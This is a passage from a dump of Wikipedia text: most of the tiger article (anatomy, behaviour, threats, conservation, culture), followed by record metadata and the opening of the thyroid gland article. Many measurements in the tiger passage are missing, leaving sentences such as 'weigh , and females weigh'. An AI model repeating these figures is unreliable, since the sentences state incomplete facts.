front paws, a large head and a tail that is about half the length of the rest of its body. It has five digits, including a dewclaw, on the front feet and four on the back, all of which have retractile claws that are compact and curved, and can reach long. The ears are rounded and the eyes have a round pupil. The snout ends in a triangular, pink tip with small black dots, the number of which increase with age. The tiger's skull is robust, with a constricted front region, proportionally small, elliptical orbits, long nasal bones and a lengthened cranium with a large sagittal crest. It resembles a lion's skull, but differs from it in the concave or flattened underside of the lower jaw and in its longer nasals. The tiger has 30 fairly robust teeth and its somewhat curved canines are the longest in the cat family at . The tiger has a head-body length of with a tail and stands at the shoulder. The Siberian and Bengal tigers are the largest. Male Bengal tigers weigh , and females weigh ; island tigers are the smallest, likely due to insular dwarfism. Male Sumatran tigers weigh , and females weigh . The tiger is popularly thought to be the largest living felid species; but since tigers of the different subspecies and populations vary greatly in size and weight, the tiger's average size may be less than the lion's, while the largest tigers are bigger than their lion counterparts. Coat The tiger's coat usually has short hairs, reaching up to , though the hairs of the northern-living Siberian tiger can reach . Belly hairs tend to be longer than back hairs. The density of their fur is usually thin, though the Siberian tiger develops a particularly thick winter coat. The tiger has lines of fur around the face and long whiskers, especially in males. It has an orange colouration that varies from yellowish to reddish. White fur covers the underside, from head to tail, along with the inner surface of the legs and parts of the face. On the back of the ears, it has a prominent white spot, which is surrounded by black. The tiger is marked with distinctive black or dark brown stripes, which are uniquely patterned in each individual. The stripes are mostly vertical, but those on the limbs and forehead are horizontal. They are more concentrated towards the backside and those on the trunk may reach under the belly. The tips of stripes are generally sharp and some may split up or split and fuse again. Tail stripes are thick bands and a black tip marks the end. The tiger is one of only a few striped cat species. Stripes are advantageous for camouflage in vegetation with vertical patterns of light and shade, such as trees, reeds and tall grass. This is supported by a Fourier analysis study showing that the striping patterns line up with their environment. The orange colour may also aid in concealment, as the tiger's prey is colour blind and possibly perceives the tiger as green and blended in with the vegetation. Colour variations The three colour variants of Bengal tigers – nearly stripeless snow-white, white and golden – are now virtually non-existent in the wild due to the reduction of wild tiger populations but continue in captive populations. The white tiger has a white background colour with sepia-brown stripes. The golden tiger is pale golden with reddish-brown stripes. The snow-white tiger is a morph with extremely faint stripes and a pale sepia-brown ringed tail. White and golden morphs are the result of an autosomal recessive trait with a white locus and a wideband locus, respectively. The snow-white variation is caused by polygenes with both white and wideband loci. The breeding of white tigers is controversial, as they have no use for conservation. Only 0.001% of wild tigers have the genes for this colour morph and the overrepresentation of white tigers in captivity is the result of inbreeding. Hence, their continued breeding will risk both inbreeding depression and loss of genetic variability in captive tigers. Pseudo-melanistic tigers with thick, merged stripes have been recorded in Simlipal National Park and three Indian zoos; a population genetic analysis of Indian tiger samples revealed that this phenotype is caused by a mutation of a transmembrane aminopeptidase gene. Around 37% of the Simlipal tiger population has this feature, which has been linked to genetic isolation. Distribution and habitat The tiger historically ranged from eastern Turkey, northern Iran and Afghanistan to Central Asia and from northern Pakistan through the Indian subcontinent and Indochina to southeastern Siberia, Sumatra, Java and Bali. As of 2022, it inhabits less than 7% of its historical distribution and has a scattered range in the Indian subcontinent, the Indochinese Peninsula, Sumatra, northeastern China and the Russian Far East. As of 2020, India had the largest extent of global tiger habitat with , followed by Russia with . The tiger mainly lives in forest habitats and is highly adaptable. Records in Central Asia indicate that it primarily inhabited Tugay riverine forests and hilly and lowland forests in the Caucasus. In the Amur-Ussuri region of Russia and China, it inhabits Korean pine and temperate broadleaf and mixed forests; riparian forests serve as dispersal corridors, providing food and water for both tigers and ungulates. On the Indian subcontinent, it inhabits mainly tropical and subtropical moist broadleaf forests, temperate broadleaf and mixed forests, tropical moist evergreen forests, tropical dry forests, alluvial plains and the mangrove forests of the Sundarbans. In the Eastern Himalayas, it was documented in temperate forest up to an elevation of in Bhutan, of in the Mishmi Hills and of in Mêdog County, southeastern Tibet. In Thailand, it lives in deciduous and evergreen forests. In Sumatra, it inhabits lowland peat swamp forests and rugged montane forests. Population density Camera trapping during 2010–2015 in the deciduous and subtropical pine forest of Jim Corbett National Park, northern India revealed a stable tiger population density of 12–17 individuals per in an area of . In northern Myanmar, the population density in a sampled area of roughly in a mosaic of tropical broadleaf forest and grassland was estimated to be 0.21–0.44 tigers per as of 2009. Population density in mixed deciduous and semi-evergreen forests of Thailand's Huai Kha Khaeng Wildlife Sanctuary was estimated at 2.01 tigers per ; during the 1970s and 1980s, logging and poaching had occurred in the adjacent Mae Wong and Khlong Lan National Parks, where population density was much lower, estimated at only 0.359 tigers per as of 2016. Population density in dipterocarp and montane forests in northern Malaysia was estimated at 1.47–2.43 adult tigers per in Royal Belum State Park, but 0.3–0.92 adult tigers per in the unprotected selectively logged Temengor Forest Reserve. Behaviour and ecology Camera trap data show that tigers in Chitwan National Park avoided locations frequented by people and were more active at night than during day. In Sundarbans National Park, six radio-collared tigers were most active from dawn to early morning and reached their zenith around 7:00 o'clock in the morning. A three-year-long camera trap survey in Shuklaphanta National Park revealed that tigers were most active from dusk until midnight. In northeastern China, tigers were crepuscular and active at night with activity peaking at dawn and dusk; they were largely active at the same time as their prey. The tiger is a powerful swimmer and easily transverses rivers as wide as ; it immerses in water, particularly on hot days. In general, it is less capable of climbing trees than many other cats due to its size, but cubs under 16 months old may routinely do so. An adult was recorded climbing up a smooth pipal tree. Social spacing Adult tigers lead largely solitary lives within home ranges or territories, the size of which mainly depends on prey abundance, geographic area and sex of the individual. Males and females defend their home ranges from those of the same sex and the home range of a male encompasses that of multiple females. Two females in the Sundarbans had home ranges of . In Panna Tiger Reserve, the home ranges of five reintroduced females varied from in winter to in summer and to during the monsoon; three males had large home ranges in winter, in summer and during monsoon seasons. In Sikhote-Alin Biosphere Reserve, 14 females had home ranges and five resident males of that overlapped with those of up to five females. When tigresses in the same reserve had cubs of up to four months of age, they reduced their home ranges to stay near their young and steadily enlarged them until their offspring were 13–18 months old. The tiger is a long-ranging species and individuals disperse over distances of up to to reach tiger populations in other areas. Young tigresses establish their first home ranges close to their mothers' while males migrate further than their female counterparts. Four radio-collared females in Chitwan dispersed between and 10 males between . A subadult male lives as a transient in another male's home range until he is older and strong enough to challenge the resident male. Tigers mark their home ranges by spraying urine on vegetation and rocks, clawing or scent rubbing trees and marking trails with faeces, anal gland secretions and ground scrapings. Scent markings also allow an individual to pick up information on another's identity. Unclaimed home ranges, particularly those that belonged to a deceased individual, can be taken over in days or weeks. Male tigers are generally less tolerant of other males within their home ranges than females are of other females. Disputes are usually solved by intimidation rather than fighting. Once dominance has been established, a male may tolerate a subordinate within his range, as long as they do not come near him. The most serious disputes tend to occur between two males competing for a female in oestrus. Though tigers mostly live alone, relationships between individuals can be complex. Tigers are particularly social at kills and a male tiger will sometimes share a carcass with the females and cubs within this home range and unlike male lions, will allow them to feed on the kill before he is finished with it. However, a female is more tense when encountering another female at a kill. Communication During friendly encounters and bonding, tigers rub against each other's bodies. Facial expressions include the "defence threat", which involves a wrinkled face, bared teeth, pulled-back ears and widened pupils. Both males and females show a flehmen response, a characteristic curled-lip grimace, when smelling urine markings. Males also use the flehmen to detect the markings made by tigresses in oestrus. Tigers will move their ears around to display the white spots, particularly during aggressive encounters and between mothers and cubs. They also use their tails to signal their mood. To show cordiality, the tail sticks up and sways slowly, while an apprehensive tiger lowers its tail or wags it side-to-side. When calm, the tail hangs low. Tigers are normally silent but can produce numerous vocalisations. They roar to signal their presence to other individuals over long distances. This vocalisation is forced through an open mouth as it closes and can be heard away. They roar multiple times in a row and others respond in kind. Tigers also roar during mating and a mother will roar to call her cubs to her. When tense, tigers moan, a sound similar to a roar but softer and made when the mouth is at least partially closed. Moaning can be heard away. Aggressive encounters involve growling, snarling and hissing. An explosive "coughing roar" or "coughing snarl" is emitted through an open mouth and exposed teeth. In friendlier situations, tigers prusten, a soft, low-frequency snorting sound similar to purring in smaller cats. Tiger mothers communicate with their cubs by grunting, while cubs call back with miaows. When startled, they "woof". They produce a deer-like "pok" sound for unknown reasons, but most often at kills. Hunting and diet The tiger is a carnivore and an apex predator feeding mainly on large and medium-sized ungulates, with a preference for sambar deer, Manchurian wapiti, barasingha, gaur and wild boar. Abundance and body weight of prey species are assumed to be the main criteria for the tiger's prey selection, both inside and outside protected areas. It also preys opportunistically on smaller species like monkeys, peafowl and other ground-based birds, porcupines and fish. Occasional attacks on Asian elephants and Indian rhinoceroses have also been reported. More often, tigers take the more vulnerable calves. They sometimes prey on livestock and dogs in close proximity to settlements. Tigers occasionally consume vegetation, fruit and minerals for dietary fibre and supplements. Tigers learn to hunt from their mothers, though the ability to hunt may be partially inborn. Depending on the size of the prey, they typically kill weekly though mothers must kill more often. Families hunt together when cubs are old enough. They search for prey using vision and hearing. A tiger will also wait at a watering hole for prey to come by, particularly during hot summer days. It is an ambush predator and when approaching potential prey, it crouches with the head lowered and hides in foliage. It switches between creeping forward and staying still. A tiger may even doze off and can stay in the same spot for as long as a day, waiting for prey and launch an attack when the prey is close enough, usually within . If the prey spots it before then, the cat does not pursue further. A tiger can sprint and leap ; it is not a long-distance runner and gives up a chase if prey outpaces it over a certain distance. The tiger attacks from behind or at the sides and tries to knock the target off balance. It latches onto prey with its forelimbs, twisting and turning during the struggle and tries to pull it to the ground. The tiger generally applies a bite to the throat until its victim dies of strangulation. It has an average bite force at the canine tips of 1234.3 newtons. Holding onto the throat puts the cat out of reach of horns, antlers, tusks and hooves. Tigers are adaptable killers and may use other methods, including ripping the throat or breaking the neck. Large prey may be disabled by a bite to the back of the hock, severing the tendon. Swipes from the large paws are capable of stunning or breaking the skull of a water buffalo. They kill small prey with a bite to the back of the neck or head. Estimates of the success rate for hunting tigers range from a low of 5% to a high of 50%. They are sometimes killed or injured by large or dangerous prey like gaur, buffalo and boar. Tigers typically move kills to a private, usually vegetated spot no further than , though they have been recorded dragging them . They are strong enough to drag the carcass of a fully grown buffalo for some distance. They rest for a while before eating and can consume as much as of meat in one session, but feed on a carcass for several days, leaving little for scavengers. Competitors In much of their range, tigers share habitat with leopards and dholes. They typically dominate both of them, though with dholes it depends on their pack size. Interactions between the three predators involve chasing, stealing kills and direct killing. Large dhole packs may kill tigers. Tigers, leopards and dholes coexist by hunting different sized prey. In Nagarhole National Park, the average weight for tiger kills was found to be , compared to for leopards and for dholes. In Kui Buri National Park, following a reduction in prey numbers, tigers continued to kill favoured prey while leopards and dholes increased their consumption of small prey. Both leopards and dholes can live successfully in tiger habitat when there is abundant food and vegetation cover. Otherwise, they appear to be less common where tigers are numerous. The recovery of the tiger population in Rajaji National Park during the 2000s led to a reduction in leopard population densities. Similarly, at two sites in central India the size of dhole packs was negatively correlated with tiger densities. Leopard and dhole distribution in Kui Buri correlated with both prey access and tiger scarcity. In Jigme Dorji National Park, tigers were found to inhabit the deeper parts of forests while the smaller predators were pushed closer to the fringes. Reproduction and life cycle The tiger generally mates all year round, particularly between November and April. A tigress is in oestrus for three to six days at a time, separated by three to nine week intervals. A resident male mates with all the females within his home range, who signal their receptiveness by roaring and marking. Younger, transient males are also attracted, leading to a fight in which the more dominant, resident male drives the usurper off. During courtship, the male is cautious with the female as he waits for her to show signs she is ready to mate. She signals to him by positioning herself in lordosis with her tail to the side. Copulation typically lasts no more than 20 seconds, with the male biting the female by the scruff of her neck. After it is finished, the male quickly pulls away as the female may turn and slap him. Tiger pairs may stay together for up to four days and mate multiple times. Gestation lasts around or over three months. A tigress gives birth in a secluded location, be it in dense vegetation, in a cave or under a rocky shelter. Litters consist of as many as seven cubs, but two or three are more typical. Newborn cubs weigh and are blind and altricial. The mother licks and cleans her cubs, suckles them and viciously defends them from any potential threat. Cubs open their eyes at the age of three to 14 days and their vision becomes clear after a few more weeks. They can leave the denning site after two months and around the same time they start eating meat. The mother only leaves them alone to hunt and even then she does not travel far. When she suspects an area is no longer safe, she moves her cubs to a new spot, transporting them one by one by grabbing them by the scruff of the neck with her mouth. A tigress in Sikhote-Alin Biosphere Reserve maximised the time spent with her cubs by reducing her home range, killing larger prey and returning to her den more rapidly than without cubs; when the cubs started to eat meat, she took them to kill sites, thereby optimising their protection and access to food. In the same reserve, one of 21 cubs died in over eight years of monitoring and mortality did not differ between male and female juveniles. Tiger monitoring over six years in Ranthambore Tiger Reserve indicated an average annual survival rate of around 85 percent for 74 male and female cubs; survival rate increased to 97 percent for both males and female juveniles of one to two years of age. Causes of cub mortality include predators, floods, fires, death of the mother and fatal injuries. After around two months, the cubs are able to follow their mother. They still hide in vegetation when she goes hunting. Young bond through play fighting and practice stalking. A hierarchy develops in the litter, with the biggest cub, often a male, being the most dominant and the first to eat its fill at a kill. Around the age of six months, cubs are fully weaned and have more freedom to explore their environment. Between eight and ten months, they accompany their mother on hunts. A cub can make a kill as early as 11 months and reach independence as a juvenile of 18 to 24 months of age; males become independent earlier than females. Radio-collared tigers in Chitwan started leaving their natal areas at the age of 19 months. Young females are sexually mature at three to four years, whereas males are at four to five years. Generation length of the tiger is about 7–10 years. Wild Bengal tigers live 12–15 years. Data from the International Tiger Studbook 1938–2018 indicate that captive tigers lived up to 19 years. The father does not play a role in raising the young, but he encounters and interacts with them. The resident male appears to visit the female–cub families within his home range. They socialise and even share kills. One male was recorded looking after cubs whose mother had died. By defending his home range, the male protects the females and cubs from other males. When a new male takes over, dependent cubs are at risk of infanticide as the male attempts to sire his own young with the females. A seven-year long study in Chitwan National Park revealed that 12 of 56 detected cubs and juveniles were killed by new males taking over home ranges. Health and diseases Tigers are recorded as hosts for various parasites including tapeworms like Diphyllobothrium erinacei, Taenia pisiformis in India and nematodes like Toxocara species in India and Physaloptera preputialis, Dirofilaria ursi and Uiteinarta species in Siberia. Canine distemper is known to occur in Siberian tigers. A morbillivirus infection was the likely cause of death of a tigress in the Russian Far East that was also tested positive for feline panleukopenia and feline coronavirus. Blood samples from 11 adult tigers in Nepal showed antibodies for canine parvovirus-2, feline herpesvirus, feline coronavirus, leptospirosis and Toxoplasma gondii. Threats The tiger has been listed as Endangered on the IUCN Red List since 1986 and the global tiger population is thought to have continuously declined from an estimated population of 5,000–8,262 tigers in the late 1990s to 3,726–5,578 individuals estimated as of 2022. During 2001–2020, landscapes where tigers live declined from to . Habitat destruction, habitat fragmentation and poaching for fur and body parts are the major threats that contributed to the decrease of tiger populations in all range countries. Protected areas in central India are highly fragmented due to linear infrastructure like roads, railway lines, transmission lines, irrigation channels and mining activities in their vicinity. In the Tanintharyi Region of southern Myanmar, deforestation coupled with mining activities and high hunting pressure threatens the tiger population. In Thailand, nine of 15 protected areas hosting tigers are isolated and fragmented, offering a low probability for dispersal between them; four of these have not harboured tigers since about 2013. In Peninsular Malaysia, of tiger habitat was cleared during 1988–2012, most of it for industrial plantations. Large-scale land acquisitions of about for commercial agriculture and timber extraction in Cambodia contributed to the fragmentation of potential tiger habitat, especially in the Eastern Plains. Inbreeding depression coupled with habitat destruction, insufficient prey resources and poaching is a threat to the small and isolated tiger population in the Changbai Mountains along the China–Russia border. In China, tigers became the target of large-scale 'anti-pest' campaigns in the early 1950s, where suitable habitats were fragmented following deforestation and resettlement of people to rural areas, who hunted tigers and prey species. Though tiger hunting was prohibited in 1977, the population continued to decline and is considered extinct in South China since 2001. Tiger populations in India have been targeted by poachers since the 1990s and were extirpated in two tiger reserves in 2005 and 2009. Between March 2017 and January 2020, 630 activities of hunters using snares, drift nets, hunting platforms and hunting dogs were discovered in a reserve forest of about in southern Myanmar. Nam Et-Phou Louey National Park was considered the last important site for the tiger in Laos, but it has not been recorded there at least since 2013; this population likely fell victim to indiscriminate snaring. Anti-poaching units in Sumatra's Kerinci Seblat landscape removed 362 tiger snare traps and seized 91 tiger skins during 2005–2016; annual poaching rates increased with rising skin prices. Poaching is also the main threat to the tiger population in far eastern Russia, where logging roads facilitate access for poachers and people harvesting forest products that are important for prey species to survive in winter. Body parts of 207 tigers were detected during 21 surveys in 1991–2014 in two wildlife markets in Myanmar catering to customers in Thailand and China. During the years 2000–2022, at least 3,377 tigers were confiscated in 2,205 seizures in 28 countries; seizures encompassed 665 live and 654 dead individuals, 1,313 whole tiger skins, 16,214 body parts like bones, teeth, paws, claws, whiskers and of meat; 759 seizures in India encompassed body parts of 893 tigers; and 403 seizures in Thailand involved mostly captive-bred tigers. Seizures in Nepal between January 2011 and December 2015 obtained 585 pieces of tiger body parts and two whole carcasses in 19 districts. Seizure data from India during 2001–2021 indicate that tiger skins were the most often traded body parts, followed by claws, bones and teeth; trafficking routes mainly passed through the states of Maharashtra, Karnataka, Tamil Nadu and Assam. A total of 292 illegal tiger parts were confiscated at US ports of entry from personal baggage, air cargo and mail between 2003 and 2012. Demand for tiger parts for use in traditional Chinese medicine has also been cited as a major threat to tiger populations. Interviews with local people in the Bangladeshi Sundarbans revealed that they kill tigers for local consumption and trade of skins, bones and meat, in retaliation for attacks by tigers and for excitement. Tiger body parts like skins, bones, teeth and hair are consumed locally by wealthy Bangladeshis and are illegally trafficked from Bangladesh to 15 countries including India, China, Malaysia, Korea, Vietnam, Cambodia, Japan and the United Kingdom via land borders, airports and seaports. Tiger bone glue is the prevailing tiger product purchased for medicinal purposes in Hanoi and Ho Chi Minh City. "Tiger farm" facilities in China and Southeast Asia breed tigers for their parts, but these appear to make the threat to wild populations worse by increasing the demand for tiger products. Local people killing tigers in retaliation for attacking and preying on livestock is a threat in several tiger range countries, as this consequence of human–wildlife conflict also contributes to the decline of the population. Conservation Internationally, the tiger is protected under CITES Appendix I, banning trade of live tigers and their body parts. In Russia, hunting the tiger has been banned since 1952. In Bhutan, it has been protected since 1969 and enlisted as totally protected since 1995. Since 1972, it has been afforded the highest protection level under India's Wild Life (Protection) Act, 1972. In Nepal and Bangladesh, it has been protected since 1973. Since 1976, it has been totally protected under Malaysia's Protection of Wild Life Act, and the country's Wildlife Conservation Act enacted in 2010 increased punishments for wildlife-related crimes. In Indonesia, it has been protected since 1990. In China, the trade in tiger body parts was banned in 1993. The Thai Wildlife Preservation and Protection Act was enacted in 2019 to combat poaching and trading of body parts. In 1973, the National Tiger Conservation Authority and Project Tiger were founded in India to gain public support for tiger conservation. Since then, 53 tiger reserves covering an area of have been established in the country up to 2022. Myanmar's national tiger conservation strategy developed in 2003 comprises management tasks such as restoration of degraded habitats, increasing the extent of protected areas and wildlife corridors, protecting tiger prey species, thwarting tiger killing and illegal trade of its body parts and promoting public awareness through wildlife education programmes. Bhutan's first Tiger Action Plan implemented during 2006–2015 revolved around habitat conservation, human–wildlife conflict management, education and awareness; the second Action Plan aimed at increasing the country's tiger population by 20% until 2023 compared to 2015. In 2009, the Bangladesh Tiger Action Plan was initiated to stabilise the country's tiger population, maintain habitat and a sufficient prey base, improve law enforcement and foster cooperation between governmental agencies responsible for tiger conservation. The Thailand Tiger Action Plan ratified in 2010 envisioned increasing the country's tiger populations by 50% in the Western Forest Complex and Dong Phayayen–Khao Yai Forest Complex and reestablish populations in three potential landscapes until 2022. The Indonesian National Tiger Recovery Program ratified in 2010 aimed at increasing the Sumatran tiger population by 2022. The third strategic and action plan for the conservation of the Sumatran tiger for the years 2020–2030 revolves around strengthening management of small tiger population units of less than 20 mature individuals and connectivity between 13 forest patches in North Sumatra and West Sumatra provinces. Increases in anti-poaching patrol efforts in four Russian protected areas during 2011–2014 contributed to reducing poaching, stabilising the tiger population and improving protection of ungulate populations. Poaching and trafficking were declared to be moderate and serious crimes in 2019. Anti-poaching operations were also established in Nepal in 2010, with increased cooperation and intelligence sharing between agencies. These policies have led to many years of "zero poaching" and the country's tiger population has doubled in a decade. Anti-poaching patrols in the large core area of Taman Negara lead to a decrease of poaching frequency from 34 detected incidents in 2015–2016 to 20 incidents during 2018–2019; the arrest of seven poaching teams and removal of snares facilitated the survival of three resident female tigers and at least 11 cubs. Army and police officers are deployed for patrolling together with staff of protected areas in Malaysia. Wildlife corridors are important conservation measures as they facilitate tiger populations to connect between protected areas; tigers use at least nine corridors that were established in the Terai Arc Landscape and Sivalik Hills in both Nepal and India. Corridors in forested areas with low human encroachment are highly suitable. In West Sumatra, 12 wildlife corridors were identified as high priority for mitigating human–wildlife conflicts. In 2019, China and Russia signed a memorandum of understanding for transboundary cooperation between two protected areas, Northeast China Tiger and Leopard National Park and Land of the Leopard National Park, that includes the creation of wildlife corridors and bilateral monitoring and patrolling along the Sino-Russian border. Rescued and rehabilitated problem tigers and orphaned tiger cubs have been released into the wild and monitored in India, Sumatra and Russia. In Kazakhstan, habitat restoration and reintroduction of prey species in Ile-Balkash Nature Reserve have progressed and tiger reintroduction is planned for 2025. Reintroduction of tigers is considered possible in eastern Cambodia, once management of protected areas is improved and forest loss stabilized. South China tigers are kept and bred in Chinese zoos, with plans to reintroduce their offspring into remote protected areas. Coordinated breeding programs among zoos have led to enough genetic diversity in tigers to act as "insurance against extinction in the wild". Relationship with humans Hunting Tigers have been hunted by humans for millennia, as indicated by a painting on the Bhimbetka rock shelters in India that is dated to 5,000–6,000 years ago. They were hunted throughout their range in Asia, chased on horseback, elephant-back or even with sled dogs and killed with spears and later firearms. Such hunts were conducted both by native governments and empires like the Mughal Empire, as well as European colonists. Tigers were often hunted as trophies and because of their perceived danger. An estimated 80,000 tigers were killed between 1875 and 1925. Attacks In most areas, tigers avoid humans, but attacks are a risk wherever people coexist with them. Dangerous encounters are more likely to occur in edge habitats between wild and agricultural areas. Most attacks on humans are defensive, including protection of young; however, tigers do sometimes see people as prey. Man-eating tigers tend to be old and disabled. Tigers driven from their home ranges are also at risk of turning to man-eating. At the beginning of the 20th century, the Champawat Tiger was responsible for over 430 human deaths in Nepal and India before she was shot by Jim Corbett. This tigress suffered from broken teeth and was unable to kill normal prey. Modern authors speculate that sustaining on meagre human flesh forced the cat to kill more and more. Tiger attacks were particularly high in Singapore during the mid-19th century, when plantations expanded into the tiger's habitat. In the 1840s, the number of deaths in the area ranged from 200 to 300 annually. Tiger attacks in the Sundarbans caused 1,396 human deaths in the period 1935–2006 according to official records of the Bangladesh Forest Department. Victims of these attacks are local villagers who enter the tiger's domain to collect resources like wood and honey. Fishermen have been particularly common targets. Methods to counter tiger attacks have included face masks worn backwards, protective clothes, sticks and carefully stationed electric dummies. Captivity Tigers have been kept in captivity since ancient times. In ancient Rome, tigers were displayed in amphitheatres; they were slaughtered in venatio hunts and used to kill criminals. The Mongol ruler Kublai Khan is reported to have kept tigers in the 13th century. Starting in the Middle Ages, tigers were being kept in European menageries. Tigers and other exotic animals were mainly used for the entertainment of elites but from the 19th century onward, they were exhibited more to the public. Tigers were particularly big attractions and their captive population soared. In 2020, there were over 8,000 captive tigers in Asia, over 5,000 in the US and no less than 850 in Europe. There are more tigers in captivity than in the wild. Captive tigers may display stereotypical behaviours such as pacing or inactivity. Modern zoos are able to reduce such behaviours with exhibits designed so the animals can move between separate but connected enclosures. Enrichment items are also important for the cat's welfare and the stimulation of its natural behaviours. Tigers have played prominent roles in circuses and other live performances. Ringling Bros included many tiger tamers in the 20th century including Mabel Stark, who became a big draw and had a long career. She was well known for being able to control the tigers despite being a small woman; using "manly" tools like whips and guns. Another trainer was Clyde Beatty, who used chairs, whips and guns to provoke tigers and other beasts into acting fierce and allowed him to appear courageous. He would perform with as many as 40 tigers and lions in one act. From the 1960s onward, trainers like Gunther Gebel-Williams would use gentler methods to control their animals. Sara Houcke was dubbed "the Tiger Whisperer" as she trained the cats to obey her by whispering to them. Siegfried & Roy became famous for performing with white tigers in Las Vegas. The act ended in 2003 when a tiger attacked Roy during a performance. In 2009, tigers were the most traded circus animals. The use of tigers and other animals in shows eventually declined in many countries due to pressure from animal rights groups and greater desires from the public to see them in more natural settings. Several countries restrict or ban such acts. Tigers have become popular in the exotic pet trade, particularly in the United States where only 6% of the captive tiger population in 2020 were being housed in zoos and other facilities approved by the Association of Zoos and Aquariums. Private collectors are thought to be ill-equipped to provide proper care for tigers, which compromises their welfare. They can also threaten public safety by allowing people to interact with them. The keeping of tigers and other big cats by private people was banned in the US in 2022. Most countries in the European Union have banned breeding and keeping tigers outside of licensed zoos and rescue centres, but some still allow private holdings. Cultural significance The tiger is among the most famous of the charismatic megafauna. Kailash Sankhala has called it "a rare combination of courage, ferocity and brilliant colour", while Candy d'Sa calls it "fierce and commanding on the outside, but noble and discerning on the inside". In a 2004 online poll involving more than 50,000 people from 73 countries, the tiger was voted the world's favourite animal with 21% of the vote, narrowly beating the dog. Similarly, a 2018 study found the tiger to be the most popular wild animal based on surveys, as well as appearances on websites of major zoos and posters of some animated movies. While the lion represented royalty and power in Western culture, the tiger played such a role in various Asian cultures. In ancient China, the tiger was seen as the "king of the forest" and symbolised the power of the emperor. In Chinese astrology, the tiger is the third out of 12 symbols in the Chinese zodiac and controls the period between 15:00 and 17:00 o'clock in the afternoon. The Year of the Tiger is thought to bring "dramatic and extreme events". The White Tiger is one of the Four Symbols of the Chinese constellations, representing the west along with the yin and the season of autumn. It is the counterpart to the Azure Dragon, which conversely symbolises the east, yang and springtime. The tiger is one of the animals displayed on the Pashupati seal of the Indus Valley Civilisation. The big cat was depicted on seals and coins during the Chola dynasty of southern India, as it was the official emblem. Tigers have had religious and folkloric significance. In Buddhism, the tiger, monkey and deer are the Three Senseless Creatures, with the tiger symbolising anger. In Hinduism, the tiger is the vehicle of Durga, the goddess of feminine power and peace, whom the gods created to fight demons. Similarly, in the Greco-Roman world, the tiger was depicted being ridden by the god Dionysus. In Korean mythology, tigers are messengers of the Mountain Gods. In both Chinese and Korean culture, tigers are seen as protectors against evil spirits and their image was used to decorate homes, tombs and articles of clothing. In the folklore of Malaysia and Indonesia, "tiger shamans" heal the sick by invoking the big cat. People turning into tigers and the inverse has also been widespread; in particular weretigers are people who could change into tigers and back again. The Mnong people of Indochina believed that tigers could shapeshift into humans. Among some indigenous peoples of Siberia, it was believed that men would seduce women by transforming into tigers. William Blake's 1794 poem "The Tyger" portrays the animal as the duality of beauty and ferocity. It is the sister poem to "The Lamb" in Blake's Songs of Innocence and of Experience and he ponders how God could create such different creatures. The tiger is featured in the mediaeval Chinese novel Water Margin, where the cat battles and is slain by the bandit Wu Song, while the tiger Shere Khan in Rudyard Kipling's The Jungle Book (1894) is the mortal enemy of the human protagonist Mowgli. Friendly tame tigers have also existed in culture, notably Tigger, the Winnie-the-Pooh character and Tony the Tiger, the Kellogg's cereal mascot.
Biology and health sciences
Carnivora
null
30078
https://en.wikipedia.org/wiki/Thyroid
Thyroid
The thyroid, or thyroid gland, is an endocrine gland in vertebrates. In humans, it is a butterfly-shaped gland located in the neck below the Adam's apple. It consists of two connected lobes. The lower two thirds of the lobes are connected by a thin band of tissue called the isthmus (: isthmi). Microscopically, the functional unit of the thyroid gland is the spherical thyroid follicle, lined with follicular cells (thyrocytes), and occasional parafollicular cells that surround a lumen containing colloid. The thyroid gland secretes three hormones: the two thyroid hormonestriiodothyronine (T3) and thyroxine (T4)and a peptide hormone, calcitonin. The thyroid hormones influence the metabolic rate and protein synthesis and growth and development in children. Calcitonin plays a role in calcium homeostasis. Secretion of the two thyroid hormones is regulated by thyroid-stimulating hormone (TSH), which is secreted from the anterior pituitary gland. TSH is regulated by thyrotropin-releasing hormone (TRH), which is produced by the hypothalamus. Thyroid disorders include hyperthyroidism, hypothyroidism, thyroid inflammation (thyroiditis), thyroid enlargement (goitre), thyroid nodules, and thyroid cancer. Hyperthyroidism is characterized by excessive secretion of thyroid hormones: the most common cause is the autoimmune disorder Graves' disease. Hypothyroidism is characterized by a deficient secretion of thyroid hormones: the most common cause is iodine deficiency. In iodine-deficient regions, hypothyroidism (due to iodine deficiency) is the leading cause of preventable intellectual disability in children. In iodine-sufficient regions, the most common cause of hypothyroidism is the autoimmune disorder Hashimoto's thyroiditis. Structure Features The thyroid gland is a butterfly-shaped organ composed of two lobes, left and right, connected by a narrow tissue band, called an "isthmus". It weighs 25 grams in adults, with each lobe being about 5 cm long, 3 cm wide, and 2 cm thick and the isthmus about 1.25 cm in height and width. The gland is usually larger in women than in men, and increases in size during pregnancy. The thyroid is near the front of the neck, lying against and around the front of the larynx and trachea. The thyroid cartilage and cricoid cartilage lie just above the gland, below the Adam's apple. The isthmus extends from the second to third rings of the trachea, with the uppermost part of the lobes extending to the thyroid cartilage and the lowermost around the fourth to sixth tracheal rings. The infrahyoid muscles lie in front of the gland and the sternocleidomastoid muscle to the side. Behind the outer wings of the thyroid lie the two carotid arteries. The trachea, larynx, lower pharynx and esophagus all lie behind the thyroid. In this region, the recurrent laryngeal nerve and the inferior thyroid artery pass next to or in the ligament. Typically, four parathyroid glands, two on each side, lie on each side between the two layers of the thyroid capsule, at the back of the thyroid lobes. The thyroid gland is covered by a thin fibrous capsule, which has an inner and an outer layer. The inner layer extrudes into the gland and forms the septa that divide the thyroid tissue into microscopic lobules. The outer layer is continuous with the pretracheal fascia, attaching the gland to the cricoid and thyroid cartilages via a thickening of the fascia to form the posterior suspensory ligament of thyroid gland, also known as Berry's ligament. This causes the thyroid to move up and down with the movement of these cartilages when swallowing occurs. Blood, lymph and nerve supply The thyroid is supplied with arterial blood from the superior thyroid artery, a branch of the external carotid artery, and the inferior thyroid artery, a branch of the thyrocervical trunk, and sometimes by an anatomical variant the thyroid ima artery, which has a variable origin. The superior thyroid artery splits into anterior and posterior branches supplying the thyroid, and the inferior thyroid artery splits into superior and inferior branches. The superior and inferior thyroid arteries join behind the outer part of the thyroid lobes. The venous blood is drained via superior and middle thyroid veins, which drain to the internal jugular vein, and via the inferior thyroid veins. The inferior thyroid veins originate in a network of veins and drain into the left and right brachiocephalic veins. Both arteries and veins form a plexus between the two layers of the capsule of the thyroid gland. Lymphatic drainage frequently passes the prelaryngeal lymph nodes (located just above the isthmus) and the pretracheal and paratracheal lymph nodes. The gland receives sympathetic nerve supply from the superior, middle and inferior cervical ganglion of the sympathetic trunk. The gland receives parasympathetic nerve supply from the superior laryngeal nerve and the recurrent laryngeal nerve. Variation There are many variants in the size and shape of the thyroid gland, and in the position of the embedded parathyroid glands. Sometimes there is a third lobe present called the pyramidal 